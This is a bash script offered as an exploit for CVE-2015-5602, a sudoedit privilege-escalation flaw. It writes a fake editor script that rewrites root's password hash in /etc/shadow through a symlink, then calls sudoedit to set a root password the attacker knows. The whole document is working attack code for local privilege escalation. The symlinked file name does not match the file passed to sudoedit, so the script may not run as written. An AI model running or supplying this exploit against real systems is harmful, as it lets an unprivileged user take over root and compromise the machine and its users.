#!/usr/bin/env bash# CVE-2015-5602 exploit by t0kx# https://github.com/t0kx/

1. #!/usr/bin/env bash
2. # CVE-2015-5602 exploit by t0kx
3. # https://github.com/t0kx/privesc-CVE-2015-5602
4.  
5. export EDITOR="/tmp/edit"
6. export FOLDER="${RANDOM}"
7. export PASSWD=$(printf ${RANDOM} \
8. | md5sum \
9. | awk '{print $1}')
10.  
11. prepare() {
12. cat << EOF >> /tmp/edit
13. #!/usr/bin/env bash
14. pass="$(printf "%q" $(openssl passwd -1 -salt ${RANDOM} ${PASSWD}))"
15. sed -i -e "s,^root:[^:]\+:,root:\${pass}:," \${1}
16. EOF
17. }
18.  
19. main() {
20. printf "[+] CVE-2015-5602 exploit by t0kx\n"
21. printf "[+] Creating folder...\n"
22. mkdir -p /home/${USER}/${FOLDER}/
23. printf "[+] Creating symlink\n"
24. ln -sf /etc/shadow /home/${USER}/${FOLDER}/HackMe2.txt
25. printf "[+] Modify EDITOR...\n"
26. prepare && chmod +x ${EDITOR}
27. printf "[+] Change root password to: ${PASSWD}\n"
28. sudoedit /home/${USER}/${FOLDER}/esc.txt
29. printf "[+] Done\n"
30. }; main